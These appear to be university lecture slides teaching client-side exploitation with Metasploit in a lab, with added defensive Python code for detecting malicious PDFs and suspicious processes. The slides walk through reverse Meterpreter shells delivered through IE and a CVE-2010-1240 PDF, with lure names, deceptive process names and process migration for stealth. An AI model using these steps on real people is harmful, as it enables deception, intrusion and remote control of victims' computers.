Lecture07B Client Side Exploitation
Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation
Recall: Client/Server Architecture
■ Many services on the Internet are provided via the
client/server architecture.
Social Engineering
■ In addition to the techniques of creating malicious servers
or files, an important step in client side exploitation is to
trick users into connecting to malicious servers or opening
malicious files.
▬ This step is typically performed by Social Engineering.
Social Engineering Examples
■ Dropping USB sticks containing malicious files around
locations the targets frequent.
■ Enticing people to click a malicious link by disguising it as
a link to a gift, voucher, etc.
■ Sending emails that appear to come from a boss, a government
agency, the police, etc.
Assumption
■ In this lecture, we'll assume the social engineering step is
successful.
▬ That is, a user has been successfully lured to connect to a malicious
server or open a malicious file.
Types of Client Side Exploitation
■ One typical classification of client side exploitation is based
on the client software exploited:
▬ Browser exploitation
▬ Email client exploitation
▬ PDF Reader exploitation
▬ MS Office exploitation
▬ And much more
We'll talk about two types in this lecture: Browser exploitation and
PDF Reader exploitation
Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation
Browser exploitation – Overview
■ First, create a web page containing malicious JavaScript,
or another type of code that browsers will run.
■ Then, lure users to visit this web page.
■ The malicious code will exploit a vulnerability in the
browser to gain unauthorized access to the user's
computer.
Browser exploitation – Example
■ In this example, we'll exploit a misconfiguration in the IE
browser.
▬ This misconfiguration allows remote code execution if a user views a
specially crafted Web page.
▬ A misconfiguration is not a vulnerability, but it can be as deadly as a
vulnerability.
Step 1. Search for the exploit
■ Suppose we know that our target is using an IE browser
with this misconfiguration.
■ We search for the corresponding exploit in MSF:
Step 2. Select the exploit
■ Suppose we select the exploit with Index 0 from the
returned results.
■ NB:
▬ the payload defaults to windows/meterpreter/reverse_tcp.
▬ 'windows/meterpreter/reverse_tcp' is applicable to both 32-bit and 64-
bit architectures, while 'windows/x64/meterpreter/reverse_tcp' is only
applicable to 64-bit architecture.
Step 3. Set payload
■ Since we know our Win7 VM uses a 64-bit OS, it is better to
set payload to 'windows/x64/meterpreter/reverse_tcp',
which is more reliable in our scenario.
Step 4. Show exploit and payload options
Step 5. Set options
Unlike server-side exploitation, we encounter the following
new options:
■ SRVPORT: the port number the malicious web server will listen
on.
▬ Its default is 8080.
▬ To make the port look less suspicious, it is better to set it to 80.
Step 5. Set options (cont'd)
■ URIPATH: the path part of the malicious URI (or URL) to
send to the target.
▬ That is, the part after the host name in the URL.
▬ Its default value is random, meaning a random path name will be
created.
▬ To effectively entice our target, it is better to give an enticing name such
as 'freegift', 'prize', etc.
Step 5. Set options (cont'd)
Recall: LHOST and LPORT are the IP address and port number for the
reverse Meterpreter to connect back. Since their default values are set
properly (LHOST being the IP of Kali and LPORT being 4444) by
msfconsole as shown in Step 4, we don't need to modify them here.
Step 6. Launch the attack
■ Simply enter 'exploit'
▬ The web server will start listening on port 80 to serve the malicious
page: http://192.168.76.129/prize
▬ The Meterpreter handler will start listening on port 4444.
Step 7. Our target clicks the malicious link
■ Suppose an innocent user at Win7 clicks this malicious link.
Step 8. MSF starts to exploit; and a
Meterpreter session is opened
■ NB: If a Meterpreter session is not opened, you can simply enter 'sessions'
to check.
Summary of the previous exploitation
■ If you do 'sudo ss -antp' at Kali, you'll see that Kali has both port 80
and port 4444 listening.
Diagram: the browser at the target makes a malicious HTTP connection to the web server on Kali at port 80; the Meterpreter payload then makes a Meterpreter connection back to the Meterpreter handler at port 4444.
Notes to the previous exploitation
■ Meterpreter will acquire the same privileges as IE, as it is
injected into the target through IE.
▬ If the target logs in with an administrator account, IE will have
administrator privileges. If the target logs in with a limited user account,
IE will only have limited privileges.
o This is why people should log in to their computers with limited user
accounts instead of administrator accounts.
■ In this example, the target logs into Win7 as 'alex' and runs
IE, so the Meterpreter will have the same privileges as 'alex'.
Refinement to the previous exploitation
■ If you do 'getpid' and then 'ps' in the meterpreter session obtained
previously, you'll see:
Further refinement
■ You can manually migrate Meterpreter to the true
explorer.exe after you get the Meterpreter session. Then,
the fake explorer.exe in the previous slide will disappear.
meterpreter > migrate 2576
[*] Migrating from 2112 to 2576...
[*] Migration completed successfully.
Lecture outline
■ What is Client Side Exploitation
■ Browser Exploitation
■ PDF Reader Exploitation
PDF Reader exploitation – Overview
■ Create a PDF file containing malicious code.
■ Users are lured into opening this PDF file.
■ The malicious code inside the PDF file will exploit a
vulnerability in the PDF reader to gain unauthorized access to
the user's computer.
PDF Reader exploitation – Example
■ In this example, we'll exploit a vulnerability in Adobe Reader
before v9.3.3.
▬ This vulnerability is caused by missing sanitization of a text field in the
Launch File dialog, which enables attackers to trick users into executing
an arbitrary local program specified in a PDF document.
▬ CVE ID: CVE-2010-1240.
▬ For more info about this vulnerability, see:
https://www.cvedetails.com/cve/CVE-2010-1240/
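A defender-side triage check for the Launch-action pattern behind this CVE, as an added example that is not part of the original slides and not Metasploit code. It scans raw PDF bytes for risky name tokens, decodes the #xx name escapes that would otherwise hide /Launch, and extracts the program named by /F; the sample PDF is constructed with a placeholder target, and the scanner only sees names in uncompressed objects.

```python
import re

# Constructed sample (not a real exploit file, not generated by Metasploit): a PDF
# whose open action is a Launch action with a placeholder target and a #xx-escaped name
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /Type /Action /S /L#61unch /F (PLACEHOLDER_PROGRAM) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

RISKY_NAMES = {"Launch", "OpenAction", "AA", "JavaScript", "JS", "EmbeddedFile"}

def normalize_names(data):
    """Decode #xx escapes inside PDF name tokens so that /L#61unch reads as /Launch."""
    unescape = lambda m: b"/" + re.sub(rb"#([0-9A-Fa-f]{2})",
                                      lambda h: bytes([int(h.group(1), 16)]), m.group(1))
    return re.sub(rb"/([^\s/<>\[\]()]+)", unescape, data)

def scan_pdf(data):
    """Count risky name tokens and list the programs named by Launch actions."""
    data = normalize_names(data)
    counts = {}
    for name in sorted(RISKY_NAMES):
        n = len(re.findall(rb"/" + name.encode() + rb"(?![A-Za-z0-9])", data))
        if n:
            counts[name] = n
    # CVE-2010-1240 pattern: /S /Launch with /F naming the local program to run
    # (only the plain /F (...) form is parsed; objects inside FlateDecode streams
    # must be inflated before scanning, which this example does not do)
    targets = [t.decode("latin-1") for t in
               re.findall(rb"/S\s*/Launch[^>]*?/F\s*\(([^)]*)\)", data)]
    return counts, targets

def verdict(data):
    """Gateway policy: block any Launch action, review other active content, else allow."""
    counts, targets = scan_pdf(data)
    if "Launch" in counts:
        return "block: Launch action" + (" targeting " + ", ".join(targets) if targets else "")
    if any(k in counts for k in ("EmbeddedFile", "JavaScript", "JS", "AA")):
        return "review: active content " + str(counts)
    return "allow"
```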
Step 1. Search for the exploit
■ Suppose we know that our Win7 VM is using Adobe
Reader v9.2.
■ We search for the exploit using the CVE ID:
Step 2. Select the exploit
■ Our experience suggests that the exploit with index 1 has a
better chance of succeeding, so we'll select it in our demo.
■ NB:
▬ the payload defaults to windows/meterpreter/reverse_tcp.
▬ 'windows/meterpreter/reverse_tcp' is applicable to both 32-bit and 64-
bit architectures, while 'windows/x64/meterpreter/reverse_tcp' is only
applicable to 64-bit architecture.
Step 3. Set payload
■ Since we know our Win7 VM uses a 64-bit OS, it is better to
set payload to 'windows/x64/meterpreter/reverse_tcp',
which is more reliable in our scenario.
msf6 > set payload windows/x64/meterpreter/reverse_tcp
payload <= windows/x64/meterpreter/reverse_tcp
Step 4. Show exploit and payload options
Step 5. Set options
■ EXENAME: the name of the Meterpreter process shown on the
target.
▬ A hacker will choose a deceptive name rather than the default value, e.g.
iexplorer.exe, svchost.exe, etc.
Step 6. Generate the malicious file
■ Simply enter 'exploit' or 'run'
▬ 'run' is an alias for 'exploit'.
▬ The malicious pdf file named voucher.pdf will be generated.
Step 7. Create a handler to receive the
reverse Meterpreter connection
■ This is done through the module exploit/multi/handler.
▬ This module with proper payloads can create handlers (servers) to wait
for connection requests from Meterpreter sessions, shell sessions, http
sessions, etc.
■ See the next slide on how to set its payload and options.
Step 7. Create a handler to receive the
reverse Meterpreter connection (cont'd)
■ Usually we cannot accept its default payload.
■ We need to set the handler's payload and options exactly the same
as those when we generate the malicious pdf.
■ Then, we start this handler to wait for meterpreter's reverse
connections.
Note to Step 7
Step 8. Send the pdf file to the target
■ Suppose we use some social engineering technique such
that the target downloads voucher.pdf to his/her
"Documents" directory.
■ In our lab, we can use nc to upload voucher.pdf from Kali to
Win7.
■ Since voucher.pdf is stored in the directory /root/.msf4/local/
and this directory requires root privilege to access, we need
to get a Linux shell under the root account first.
■ This can be done by the 'sudo zsh' command, where 'zsh' is
the default shell program of Kali Linux.
▬ See the screenshot in the next slide.
Step 8. Send the pdf file to the target
(cont'd)
Screenshot: a shell under root is obtained. A root shell has the prompt symbol '#'.
Step 9. Target opens this malicious file
■ Adobe Reader will prompt the user to confirm 'Open'. Here we assume
that the user fully trusts this file and will open it.
Step 9. Target opens this file (cont'd)
■ After the user clicks the 'Open' button, the Meterpreter
payload embedded in the pdf will be run, and it initiates a
connection to the waiting handler at Kali.
■ NB: Adobe Reader will show a blank pdf. If you want to
generate a pdf with some contents, it can be achieved by
using the advanced options of the
adobe_pdf_embedded_exe_nojs module. You are welcome
to explore this one by yourself.
Step 10. At Kali, the Meterpreter handler
receives the connection
■ The Meterpreter connects back to the handler at Kali, so a
Meterpreter shell is successfully obtained.
Step 10. At Kali, the Meterpreter handler
receives the connection (cont'd)
■ We can check the user account, process id, process name, etc.
■ We see that the process name is indeed the one we have specified:
iexplorer.exe.
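The EXENAME lookalike seen here, the fake explorer.exe that 'ps' showed in the browser example, and the reverse connection to the handler are all visible from the endpoint. The following is an added example (not from the slides and not Metasploit code; the process snapshot and connection table are constructed) that turns them into three triage rules.

```python
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid name")
Conn = namedtuple("Conn", "pid raddr rport")
CLIENT_APPS = {"iexplore.exe", "acrord32.exe"}   # browser and PDF reader from the lecture
SYSTEM_NAMES = {"explorer.exe", "svchost.exe"}   # names a payload likes to borrow
KNOWN_NAMES = CLIENT_APPS | SYSTEM_NAMES

def is_lookalike(name):
    """Not a known binary, but its stem embeds a known stem (iexplorer vs iexplore)."""
    stem = name.lower().rsplit(".", 1)[0]
    known = {k.rsplit(".", 1)[0] for k in KNOWN_NAMES}
    return name.lower() not in KNOWN_NAMES and any(k in stem for k in known)

def ancestors(pid, by_pid):
    """Lower-cased names on the parent chain of pid, nearest parent first."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
        if pid in by_pid:
            chain.append(by_pid[pid].name.lower())
    return chain

def triage(procs, conns):
    """Return (pid, reason) findings for the patterns the lecture describes."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        # Rule 1: EXENAME-style lookalike of a legitimate binary
        if is_lookalike(p.name):
            findings.append((p.pid, "lookalike name " + p.name))
        # Rule 2: a 'system' process beneath a browser or PDF reader (the fake explorer.exe)
        if p.name.lower() in SYSTEM_NAMES and any(a in CLIENT_APPS for a in ancestors(p.pid, by_pid)):
            findings.append((p.pid, p.name + " spawned under a client application"))
    flagged = {pid for pid, _ in findings}
    for c in conns:
        # Rule 3: a flagged process with an outbound connection is the strongest signal
        # (4444 is only Metasploit's default LPORT and is trivially changed, so do not key on it)
        if c.pid in flagged:
            findings.append((c.pid, "outbound connection to %s:%d" % (c.raddr, c.rport)))
    return findings

# Constructed sample snapshot (not real telemetry) mirroring both lecture scenarios
PROCS = [Proc(2576, 1, "explorer.exe"),       # the user's real desktop shell
         Proc(1840, 2576, "iexplore.exe"),    # browser started from the desktop
         Proc(2112, 1840, "explorer.exe"),    # fake explorer.exe living under IE
         Proc(3004, 2576, "AcroRd32.exe"),    # PDF reader
         Proc(3120, 3004, "iexplorer.exe")]   # executable the reader was made to launch
CONNS = [Conn(1840, "203.0.113.10", 80),      # ordinary browsing
         Conn(2112, "192.168.76.129", 4444),  # reverse connections to the handler
         Conn(3120, "192.168.76.129", 4444)]
```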
Defence against client-side exploitation
Example Short Answer Question:
■ What is social engineering? Also, give some examples of
social engineering.
Lecture Summary
■ Netcat is a lightweight multi-purpose networking tool,
nicknamed 'Swiss Army Knife'.
■ Client-side attacks are very popular today, because client-
side programs are used by everybody.
■ MSF can easily succeed in client-side attacks if client-side
programs are not well protected.
References
■ Online Tutorial from Offensive Security: Metasploit
Unleashed
▬ https://www.offensive-security.com/metasploit-unleashed/